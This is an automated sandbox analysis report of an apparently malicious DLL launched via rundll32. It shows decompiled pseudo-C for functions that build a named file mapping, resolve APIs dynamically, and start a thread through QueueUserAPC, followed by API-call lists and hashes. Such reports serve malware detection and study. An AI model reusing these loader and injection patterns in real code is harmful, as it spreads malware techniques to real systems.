    C-Code - Quality: 68%
    			E6D501979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
    				intOrPtr _v12;
    				struct _FILETIME* _v16;
    				short _v60;
    				struct _FILETIME* _t14;
    				intOrPtr _t15;
    				long _t18;
    				void* _t22;
    				intOrPtr _t31;
    				long _t32;
    				void* _t34;
    
    				_t31 = __edx;
    				_t14 =  &_v16;
    				GetSystemTimeAsFileTime(_t14);
    				_push(0x192);
    				_push(0x54d38000);
    				_push(_v12);
    				_push(_v16);
    				L6D502210();
    				_push(_t14);
    				_v16 = _t14;
    				_t15 =  *0x6d5041d0;
    				_push(_t15 + 0x6d50505e);
    				_push(_t15 + 0x6d505054);
    				_push(0x16);
    				_push( &_v60);
    				_v12 = _t31;
    				L6D50220A();
    				_t18 = _a4;
    				if(_t18 == 0) {
    					_t18 = 0x1000;
    				}
    				_t34 = CreateFileMappingW(0xffffffff, 0x6d5041c0, 4, 0, _t18,  &_v60);
    				if(_t34 == 0) {
    					_t32 = GetLastError();
    				} else {
    					if(_a4 != 0 || GetLastError() == 0xb7) {
    						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
    						if(_t22 == 0) {
    							_t32 = GetLastError();
    							if(_t32 != 0) {
    								goto L9;
    							}
    						} else {
    							 *_a8 = _t34;
    							 *_a12 = _t22;
    							_t32 = 0;
    						}
    					} else {
    						_t32 = 2;
    						L9:
    						CloseHandle(_t34);
    					}
    				}
    				return _t32;
    			}

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6D50176E,0000000A,?,?), ref: 6D501986
    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6D50199C
    • _snwprintf.NTDLL ref: 6D5019C1
    • CreateFileMappingW.KERNEL32(000000FF,6D5041C0,00000004,00000000,?,?), ref: 6D5019E6
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D50176E,0000000A,?), ref: 6D5019FD
    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6D501A11
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D50176E,0000000A,?), ref: 6D501A29
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6D50176E,0000000A), ref: 6D501A32
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D50176E,0000000A,?), ref: 6D501A3A
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp
    Similarity
    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
    • String ID:
    • API String ID: 1724014008-0
    • Opcode ID: eca2ba0c1dd296400f9d68847556c0f512a64476e0668771430c5ece3bb0ca80
    • Instruction ID: ab079f7893413d372e4f7cff42b988109628a2fe1d8d99388dc526d70c074c89
    • Opcode Fuzzy Hash: eca2ba0c1dd296400f9d68847556c0f512a64476e0668771430c5ece3bb0ca80
    • Instruction Fuzzy Hash: 6C21B0B2500109FFEF15AFA8CC84FAE77BCEB49359F118429FA11D7940D73099418BA1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free
    • String ID: *?
    • API String ID: 269201875-2564092906
    • Opcode ID: 17fce2d0229bb16b0366a55caf400d992325c04725859126cb095ce1f33e8906
    • Instruction ID: b0148fd6d870f852d17cd6a71daf098ccb32e60f49ea483b7a5fc2cd467fb2ec
    • Opcode Fuzzy Hash: 17fce2d0229bb16b0366a55caf400d992325c04725859126cb095ce1f33e8906
    • Instruction Fuzzy Hash: FBE13B75E0421A9FCB18CFA8C8809EEFBF5EF88314B15856AD915E7740E731AE418B91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,?,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,6D5740F0,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?,?,6D572358,0000002C,6D54A405), ref: 6D54365C
    • _free.LIBCMT ref: 6D54543D
    • _free.LIBCMT ref: 6D545456
    • _free.LIBCMT ref: 6D545494
    • _free.LIBCMT ref: 6D54549D
    • _free.LIBCMT ref: 6D5454A9
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorLast
    • String ID: C
    • API String ID: 3291180501-1037565863
    • Opcode ID: be1bed58258b06fb7847166b4753fb834d20d489f78662fcd06f3d87824dda0a
    • Instruction ID: 221bbbe7e6ddbc3bada16b3dcbc9113a2cecc7408e0312fcb30422995fd90e62
    • Opcode Fuzzy Hash: be1bed58258b06fb7847166b4753fb834d20d489f78662fcd06f3d87824dda0a
    • Instruction Fuzzy Hash: 57C1707590521A9FDB28DF18C884BADB7B4FF49304F1189EAE909A7750D770AE90CF41
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • DName::operator+.LIBCMT ref: 6D531995
    • DName::operator+.LIBCMT ref: 6D5319E8
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
      • Part of subcall function 6D530454: DName::operator+.LIBCMT ref: 6D530475
    • DName::operator+.LIBCMT ref: 6D5319D9
    • DName::operator+.LIBCMT ref: 6D531A39
    • DName::operator+.LIBCMT ref: 6D531A46
    • DName::operator+.LIBCMT ref: 6D531A8D
    • DName::operator+.LIBCMT ref: 6D531A9A
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$shared_ptr
    • String ID:
    • API String ID: 1037112749-0
    • Opcode ID: 9a087e37e0bfca6890f4cc414914e379350d638e5bf870062fb18dfd7ada2a01
    • Instruction ID: 8cc7a12e431c3729dda3184b6bb2bc2c53b86a3efcb060568d8263b3794ea76b
    • Opcode Fuzzy Hash: 9a087e37e0bfca6890f4cc414914e379350d638e5bf870062fb18dfd7ada2a01
    • Instruction Fuzzy Hash: BF515471904328ABDF0DCFA4D855EEEBBB8EF48714F02445AE605A7580FB709A44CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • DName::DName.LIBVCRUNTIME ref: 6D532C4D
    • DName::DName.LIBVCRUNTIME ref: 6D532C7A
      • Part of subcall function 6D530206: __aulldvrm.LIBCMT ref: 6D530237
    • DName::operator+.LIBCMT ref: 6D532C95
    • DName::DName.LIBVCRUNTIME ref: 6D532CB2
    • DName::DName.LIBVCRUNTIME ref: 6D532CE2
    • DName::DName.LIBVCRUNTIME ref: 6D532CEC
    • DName::DName.LIBVCRUNTIME ref: 6D532D13
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: NameName::$Name::operator+__aulldvrm
    • String ID:
    • API String ID: 4069495278-0
    • Opcode ID: 8707af7dae6e8821557766ac76da23fc36a2eb545428e39cf8dc35e19cea8b8a
    • Instruction ID: ddad8e9ba5f29ef7ed9f30353ac7c258c373e38ac6fb69f01fdd0d6216ed0fe4
    • Opcode Fuzzy Hash: 8707af7dae6e8821557766ac76da23fc36a2eb545428e39cf8dc35e19cea8b8a
    • Instruction Fuzzy Hash: 4D31E471848628AACF1DCFADC890BED7BB4FF46314F128849E151A7980F7709946CB90
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID:
    • String ID: C:\Windows\SysWOW64\rundll32.exe$nTm
    • API String ID: 0-2966304076
    • Opcode ID: d16b22704e32908585154936289f42a6f5907071d5888218b490c501db2d55d3
    • Instruction ID: 4dd8a12ea6d2bd152bb2ee82b1c6aa1c2ae69237d60635b04c6d44a03256f2f7
    • Opcode Fuzzy Hash: d16b22704e32908585154936289f42a6f5907071d5888218b490c501db2d55d3
    • Instruction Fuzzy Hash: FF21C27160830ABFA7199EA58C80AEB77ADEF41368701CA24E91897950E730EC5087E2
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D54DA16: _free.LIBCMT ref: 6D54DA3B
    • _free.LIBCMT ref: 6D54DD79
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D54DD84
    • _free.LIBCMT ref: 6D54DD8F
    • _free.LIBCMT ref: 6D54DDE3
    • _free.LIBCMT ref: 6D54DDEE
    • _free.LIBCMT ref: 6D54DDF9
    • _free.LIBCMT ref: 6D54DE04
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: f764ab8b687f2b92141a1d159079149925baf696e3bb01017a8169fa8dc5afb0
    • Instruction ID: 16db910f52149eadc1801a1ea706ac2b01935ffaaeaf18ded109503b97d09394
    • Opcode Fuzzy Hash: f764ab8b687f2b92141a1d159079149925baf696e3bb01017a8169fa8dc5afb0
    • Instruction Fuzzy Hash: 26118431549B04A6D724ABB1CC05FDF779D5FC0704F8A8826E39EB7860D734BE044652
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6D550B0A
    • __fassign.LIBCMT ref: 6D550CE9
    • __fassign.LIBCMT ref: 6D550D06
    • WriteFile.KERNEL32(?,6D54A1AC,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D550D4E
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D550D8E
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D550E3A
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: FileWrite__fassign$ConsoleErrorLast
    • String ID:
    • API String ID: 4031098158-0
    • Opcode ID: 5c9ffcbf8b481c83dd0e44072fcee6dd8ff96caaf8a7244afcba3e61293e6962
    • Instruction ID: 54c17366915b58e660ff94afe6c41bdded4c44db8c9dff32a138fca38f688fa4
    • Opcode Fuzzy Hash: 5c9ffcbf8b481c83dd0e44072fcee6dd8ff96caaf8a7244afcba3e61293e6962
    • Instruction Fuzzy Hash: 03D1CB70D042599FCF1ACFA9C880AEDBBB5BF49318F24406BE815BB641D730AE52CB50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • _free.LIBCMT ref: 6D537DD5
    • _free.LIBCMT ref: 6D537DF0
    • _free.LIBCMT ref: 6D537DFB
    • _free.LIBCMT ref: 6D537F08
      • Part of subcall function 6D545D30: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6D545D71
    • _free.LIBCMT ref: 6D537EDD
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D537EFE
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$Heap$AllocateErrorFreeLast
    • String ID:
    • API String ID: 4150789928-0
    • Opcode ID: 8ee6b15ef3700e9755a9247527990c78733c35656359cd6d7b90620d7279b0e5
    • Instruction ID: d931446e554923726cd1dd4474b34480857c40b6679f911b4449b9adb53167f7
    • Opcode Fuzzy Hash: 8ee6b15ef3700e9755a9247527990c78733c35656359cd6d7b90620d7279b0e5
    • Instruction Fuzzy Hash: 93515D76E08222EBDB0D8F7898506BA77A5DF85314F574859EA41DBA40FB319E06C3A0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • Replicator::operator[].LIBVCRUNTIME ref: 6D535DBB
    • DName::operator=.LIBVCRUNTIME ref: 6D535E0D
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator=Replicator::operator[]
    • String ID:
    • API String ID: 3211817929-0
    • Opcode ID: ca1ef999371bdb1e7a840992bc85706dc6329adb1af593fcdb9564a47297e67b
    • Instruction ID: 207e8859d230f5c46583432988c0e9f64fcb3a1dd6f5ca4dcf2b2a3037d2bf3d
    • Opcode Fuzzy Hash: ca1ef999371bdb1e7a840992bc85706dc6329adb1af593fcdb9564a47297e67b
    • Instruction Fuzzy Hash: F66191B19042299BDF0DCFA5D440BBEBBB8EF5A304F03545AE601A7A90FB749904CB91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • DName::operator+.LIBCMT ref: 6D535C6C
    • DName::operator+.LIBCMT ref: 6D535C78
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
    • DName::operator+=.LIBCMT ref: 6D535D38
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53469F
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53495D
      • Part of subcall function 6D530454: DName::operator+.LIBCMT ref: 6D530475
    • DName::operator+.LIBCMT ref: 6D535CF3
      • Part of subcall function 6D5305BD: DName::operator=.LIBVCRUNTIME ref: 6D5305DE
    • DName::DName.LIBVCRUNTIME ref: 6D535D5C
    • DName::operator+.LIBCMT ref: 6D535D68
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
    • String ID:
    • API String ID: 2795783184-0
    • Opcode ID: 22668d5699a88a05d573f2b6aa507f801ede4299453663ae4342e487a131d7b4
    • Instruction ID: 1f2e6ae3bfcfd5a6626498bfe94e201aedd3ab2de3c378f47c6da629dcc98f77
    • Opcode Fuzzy Hash: 22668d5699a88a05d573f2b6aa507f801ede4299453663ae4342e487a131d7b4
    • Instruction Fuzzy Hash: 344192B0A043686FDF09CFA8C894BBE7BF5AF46304F525859D2859BA50F7749E40CB50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D535D7E: Replicator::operator[].LIBVCRUNTIME ref: 6D535DBB
    • DName::operator=.LIBVCRUNTIME ref: 6D534A8C
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53469F
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53495D
    • DName::operator+.LIBCMT ref: 6D534A47
    • DName::operator+.LIBCMT ref: 6D534A53
    • DName::DName.LIBVCRUNTIME ref: 6D534AA0
    • DName::operator+.LIBCMT ref: 6D534AAF
    • DName::operator+.LIBCMT ref: 6D534ABB
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
    • String ID:
    • API String ID: 955152517-0
    • Opcode ID: c064d4699e858c50e14667cc1418b747083d0c70852ab021ad7803743cd2cfda
    • Instruction ID: 814d33db8aa8146a644f6b06ec32224fabd496cf99d5e9e4908289157b3e4564
    • Opcode Fuzzy Hash: c064d4699e858c50e14667cc1418b747083d0c70852ab021ad7803743cd2cfda
    • Instruction Fuzzy Hash: 9331B2719043649FCB0CCF98D490AEEBBF9EF99304F02485EE68697A40F7359A04CB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D501AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
    				intOrPtr _v8;
    				_Unknown_base(*)()* _t29;
    				_Unknown_base(*)()* _t33;
    				_Unknown_base(*)()* _t36;
    				_Unknown_base(*)()* _t39;
    				_Unknown_base(*)()* _t42;
    				intOrPtr _t46;
    				struct HINSTANCE__* _t50;
    				intOrPtr _t56;
    
    				_t56 = E6D501C8F(0x20);
    				if(_t56 == 0) {
    					_v8 = 8;
    				} else {
    					_t50 = GetModuleHandleA( *0x6d5041d0 + 0x6d505014);
    					_v8 = 0x7f;
    					_t29 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d5050e1);
    					 *(_t56 + 0xc) = _t29;
    					if(_t29 == 0) {
    						L8:
    						E6D50136A(_t56);
    					} else {
    						_t33 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d5050f1);
    						 *(_t56 + 0x10) = _t33;
    						if(_t33 == 0) {
    							goto L8;
    						} else {
    							_t36 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d505104);
    							 *(_t56 + 0x14) = _t36;
    							if(_t36 == 0) {
    								goto L8;
    							} else {
    								_t39 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d505119);
    								 *(_t56 + 0x18) = _t39;
    								if(_t39 == 0) {
    									goto L8;
    								} else {
    									_t42 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d50512f);
    									 *(_t56 + 0x1c) = _t42;
    									if(_t42 == 0) {
    										goto L8;
    									} else {
    										 *((intOrPtr*)(_t56 + 8)) = _a8;
    										 *((intOrPtr*)(_t56 + 4)) = _a4;
    										_t46 = E6D5018D1(_t56, _a12);
    										_v8 = _t46;
    										if(_t46 != 0) {
    											goto L8;
    										} else {
    											 *_a16 = _t56;
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				return _v8;
    			}

    APIs
      • Part of subcall function 6D501C8F: HeapAlloc.KERNEL32(00000000,?,6D50117D,?,00000000,00000000,?,?,?,6D501810), ref: 6D501C9B
    • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6D501272,?,?,?,?,00000002,00000000,?,?), ref: 6D501AC9
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501AEB
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501B01
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501B17
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501B2D
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501B43
      • Part of subcall function 6D5018D1: memset.NTDLL ref: 6D501950
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$AllocHandleHeapModulememset
    • String ID:
    • API String ID: 426539879-0
    • Opcode ID: 837c350207f7749dcbb6fadf70419ca32052ebbdd79332344cb6b32fa10a911d
    • Instruction ID: 06c090254e768ffffda4703e05b9072da51824ba3b85085fdd979d50398ed559
    • Opcode Fuzzy Hash: 837c350207f7749dcbb6fadf70419ca32052ebbdd79332344cb6b32fa10a911d
    • Instruction Fuzzy Hash: 612141B150060A9FDB14EF69C980E6B77FCFF59288B018429F915C7A11E730E911CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
    				long _v8;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				char _t9;
    				void* _t10;
    				void* _t18;
    				void* _t23;
    				void* _t36;
    
    				_push(__ecx);
    				_t9 = _a8;
    				_v8 = 1;
    				if(_t9 == 0) {
    					_t10 = InterlockedDecrement(0x6d504188);
    					__eflags = _t10;
    					if(_t10 == 0) {
    						__eflags =  *0x6d50418c;
    						if( *0x6d50418c != 0) {
    							_t36 = 0x2328;
    							while(1) {
    								SleepEx(0x64, 1);
    								__eflags =  *0x6d504198;
    								if( *0x6d504198 == 0) {
    									break;
    								}
    								_t36 = _t36 - 0x64;
    								__eflags = _t36;
    								if(_t36 > 0) {
    									continue;
    								}
    								break;
    							}
    							CloseHandle( *0x6d50418c);
    						}
    						HeapDestroy( *0x6d504190);
    					}
    				} else {
    					if(_t9 == 1 && InterlockedIncrement(0x6d504188) == 1) {
    						_t18 = HeapCreate(0, 0x400000, 0);
    						_t41 = _t18;
    						 *0x6d504190 = _t18;
    						if(_t18 == 0) {
    							L6:
    							_v8 = 0;
    						} else {
    							 *0x6d5041b0 = _a4;
    							asm("lock xadd [eax], edi");
    							_push( &_a8);
    							_t23 = E6D501CA4(E6D501D32, E6D501EE0(_a12, 1, 0x6d504198, _t41));
    							 *0x6d50418c = _t23;
    							if(_t23 == 0) {
    								asm("lock xadd [esi], eax");
    								goto L6;
    							}
    						}
    					}
    				}
    				return _v8;
    			}













    APIs
    • InterlockedIncrement.KERNEL32(6D504188), ref: 6D501E26
    • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 6D501E3B
      • Part of subcall function 6D501CA4: CreateThread.KERNEL32(00000000,00000000,00000000,?,6D504198,6D501E74), ref: 6D501CBB
      • Part of subcall function 6D501CA4: QueueUserAPC.KERNEL32(?,00000000,?), ref: 6D501CD0
      • Part of subcall function 6D501CA4: GetLastError.KERNEL32(00000000), ref: 6D501CDB
      • Part of subcall function 6D501CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6D501CE5
      • Part of subcall function 6D501CA4: CloseHandle.KERNEL32(00000000), ref: 6D501CEC
      • Part of subcall function 6D501CA4: SetLastError.KERNEL32(00000000), ref: 6D501CF5
    • InterlockedDecrement.KERNEL32(6D504188), ref: 6D501E8E
    • SleepEx.KERNEL32(00000064,00000001), ref: 6D501EA8
    • CloseHandle.KERNEL32 ref: 6D501EC4
    • HeapDestroy.KERNEL32 ref: 6D501ED0
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
    • String ID:
    • API String ID: 2110400756-0
    • Opcode ID: af81b4b42e9e7cef32f86eb63da37bff5263ff09e3b052b37ea79d7f3cfbc779
    • Instruction ID: e47518073d8cf81db53b54104f1926deca42c706051f8a3e86ea37be545f352f
    • Opcode Fuzzy Hash: af81b4b42e9e7cef32f86eb63da37bff5263ff09e3b052b37ea79d7f3cfbc779
    • Instruction Fuzzy Hash: EF215171A01206EBDF049FA9CC84F6E7FB8FB6A3A9752452DE605D3940E7308D008B61
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetLastError.KERNEL32(?,?,6D52E60D,6D52A335,6D52A779), ref: 6D52EB5B
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D52EB69
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D52EB82
    • SetLastError.KERNEL32(00000000,?,6D52E60D,6D52A335,6D52A779), ref: 6D52EBD4
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: 118bb4508020c1f83d1e6cdc1314d97f7598335a7bfbdad2e9831edf32118299
    • Instruction ID: 800b50aebc63435a2d98185fd5eb020afc386178abb9eebf843a45a1d35bdb7a
    • Opcode Fuzzy Hash: 118bb4508020c1f83d1e6cdc1314d97f7598335a7bfbdad2e9831edf32118299
    • Instruction Fuzzy Hash: E001F53210C3329EAE0D1675EC84F1A2BAAFB573B9733062DE121D5CD0FF2148149389
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D501CA4(long _a4, DWORD* _a12) {
    				_Unknown_base(*)()* _v0;
    				long _t11;
    				void* _t13;
    
    				_t13 = CreateThread(0, 0, __imp__SleepEx,  *0x6d5041cc, 0, _a12);
    				if(_t13 != 0 && QueueUserAPC(_v0, _t13, _a4) == 0) {
    					_t11 = GetLastError();
    					TerminateThread(_t13, _t11);
    					CloseHandle(_t13);
    					_t13 = 0;
    					SetLastError(_t11);
    				}
    				return _t13;
    			}







    APIs
    • CreateThread.KERNEL32(00000000,00000000,00000000,?,6D504198,6D501E74), ref: 6D501CBB
    • QueueUserAPC.KERNEL32(?,00000000,?), ref: 6D501CD0
    • GetLastError.KERNEL32(00000000), ref: 6D501CDB
    • TerminateThread.KERNEL32(00000000,00000000), ref: 6D501CE5
    • CloseHandle.KERNEL32(00000000), ref: 6D501CEC
    • SetLastError.KERNEL32(00000000), ref: 6D501CF5
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp
    Similarity
    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
    • String ID:
    • API String ID: 3832013932-0
    • Opcode ID: 0ab4a9fee8599366b2e6bd47becd1be40a0568556daaf98b7f1ae1b5ebd1ec7e
    • Instruction ID: e8a26b5971025458e82b0f11c085cb150f8dde0193a0cb37bfc48d88cf124303
    • Opcode Fuzzy Hash: 0ab4a9fee8599366b2e6bd47becd1be40a0568556daaf98b7f1ae1b5ebd1ec7e
    • Instruction Fuzzy Hash: 0CF01C36606622BBEF125BA08C1CF5BBF79FB0A752F02880DFA0991950D72188119BA5
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • FindFirstChangeNotificationW.KERNEL32(6D5765F0,00000001,00000002,?,00000000,?,00000000,?,?,6D52A9C8,?,?,00000000,?,?,00000000), ref: 6D529BAC
    • GetEnvironmentVariableW.KERNEL32(6D5694B8,6D5765F0,0000046C,?,00000000,?,?,6D52A9C8,?,?,00000000,?,?,00000000,?,?), ref: 6D529C4C
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ChangeEnvironmentFindFirstNotificationVariable
    • String ID: T@Wm$p@Wm$|@Wm
    • API String ID: 3880921956-4016660527
    • Opcode ID: 9493a9e2ba7cc660259aae52545f3e680d20d35343845b78211e0c9e58bfcdc3
    • Instruction ID: 056b6ea205a3d9f54d750bf959eb7774311ffb0b00422237921ebc2038dbc496
    • Opcode Fuzzy Hash: 9493a9e2ba7cc660259aae52545f3e680d20d35343845b78211e0c9e58bfcdc3
    • Instruction Fuzzy Hash: DF51EFB25442218FCF18CF28E8847B577F1F79B202B27462AE8559BF94F7745848CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$AllocateHeap
    • String ID:
    • API String ID: 3033488037-0
    • Opcode ID: 2f43f04e58bbe6c05d01fdf0cc8188675ab469ef88a5caa6e33b3a43e7653991
    • Instruction ID: d06f77792ee8f0ddd8581fb2f5d9e3da557fbdd9d909316860f9029486c7d242
    • Opcode Fuzzy Hash: 2f43f04e58bbe6c05d01fdf0cc8188675ab469ef88a5caa6e33b3a43e7653991
    • Instruction Fuzzy Hash: 11510371A44305AFDB19CF69C841B7A77F4FF88324F118969E919DBA60E770DA00CB82
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • _free.LIBCMT ref: 6D54D77D
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D54D78F
    • _free.LIBCMT ref: 6D54D7A1
    • _free.LIBCMT ref: 6D54D7B3
    • _free.LIBCMT ref: 6D54D7C5
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
